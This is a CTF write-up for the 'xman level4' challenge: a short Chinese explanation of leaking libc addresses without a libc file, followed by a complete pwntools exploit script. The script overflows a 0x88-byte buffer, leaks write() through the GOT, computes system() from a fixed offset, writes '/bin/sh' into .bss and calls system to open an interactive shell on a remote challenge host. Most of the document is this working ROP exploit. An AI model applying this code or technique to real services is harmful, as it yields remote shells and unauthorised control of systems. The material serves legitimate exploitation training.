
xman level4//一步一步rop level2 writeup

這道題在沒有 libc 的情況下考洩露地址。有兩個方法:一個是 read 之後直接 pop 三個棧引數再返回 system;另一個是重新返回 vulnerable 函數,只不過 read 只讀 8 位元組,所以要用 send,不是 sendline。

另外一個大坑是 DynELF 的使用:只能先用它洩漏出偏移,然後再用不帶 DynELF 的版本重寫一遍。

傳說中不用 libc 的另一方法:http://www.cnblogs.com/wangaohui/p/5123992.html

from pwn import *

# Session and target metadata for the level4 exercise.
# The hard-coded 0x0804xxxx values are fixed addresses, which only hold
# for a non-PIE build — presumably the case for this binary (TODO confirm).
vul = 0x0804844B   # address each frame returns to so the process can be driven again
bss = 0x0804A024   # writable scratch slot in .bss used for staged data
p = remote('218.2.197.235', 20433)
elf = ELF('./level4')
write_plt = elf.symbols['write']  # resolved via elf.symbols; named as the PLT stub by the author
read_plt = elf.symbols['read']    # same, for read()
def leak(add):
    """Read 4 raw bytes at address ``add`` from the remote process.

    The frame overflows 0x88 bytes plus 4 (presumably the saved frame
    pointer), lands on write@plt with the arguments (1, add, 4) and uses
    ``vul`` as write's return address so the process can be driven again.
    Whatever the target writes back is returned undecoded; the caller
    applies u32. Assumes recv() delivers all 4 bytes in one call — TODO
    confirm.
    """
    padding = 'A' * (0x88 + 4)
    frame = [write_plt, vul, 1, add, 4]
    payload = padding + ''.join(p32(word) for word in frame)
    p.sendline(payload)
    return p.recv(4)
#d = DynELF(leak, elf=ELF('./level4'))

#system_addr = d.lookup('system', 'libc')
#print "system_addr=" + hex(system_addr)
#payload='A'*(0x88+4)+p32(read_plt)+p32(vul)+p32(0)+p32(bss)+p32(8)
#p.sendline(payload)
#p.sendline('/bin/sh\0')
#payload='A'*(0x88+4)+p32(system_addr)+p32(vul)+p32(bss)
#p.sendline(payload)
#p.interactive()
# Leak the runtime address of write() from the GOT. With this leak the
# script no longer needs a local libc copy (see the prose above).
wr=leak(elf.got['write'])
# Distance from write() to system() in the remote libc. This value is tied
# to one libc build (per the prose it was first obtained with the DynELF run
# commented out above) and is not portable across libc versions.
offset=-0x8ab00
system_addr=u32(wr)+offset
#pppr = 0x08048509

#payload='A'*(0x88+4)+p32(read_plt)+p32(pppr)+p32(0)+p32(bss)+p32(8)+p32(system_addr) + p32(vulfun_addr) + p32(bss)

#p.sendline(payload)
#p.send("/bin/sh\0")
# Stage '/bin/sh\0' into .bss with read(0, bss, 8), returning to vul
# afterwards. read() is asked for exactly 8 bytes, so the string below is
# sent with send() rather than sendline(): a trailing newline would be one
# byte too many (this is the send/sendline point made in the prose).
payload='A'*(0x88+4)+p32(read_plt)+p32(vul)+p32(0)+p32(bss)+p32(8)
p.sendline(payload)
p.send('/bin/sh\0')
# Final frame: system(bss) with vul as system's fake return address.
# Defensive note: every step relies on fixed code/data addresses and an
# overwritable saved return address, so PIE and stack canaries would each
# break it — presumably both absent in this build (TODO confirm).
payload='A'*(0x88+4)+p32(system_addr)+p32(vul)+p32(bss)
p.sendline(payload)
p.interactive()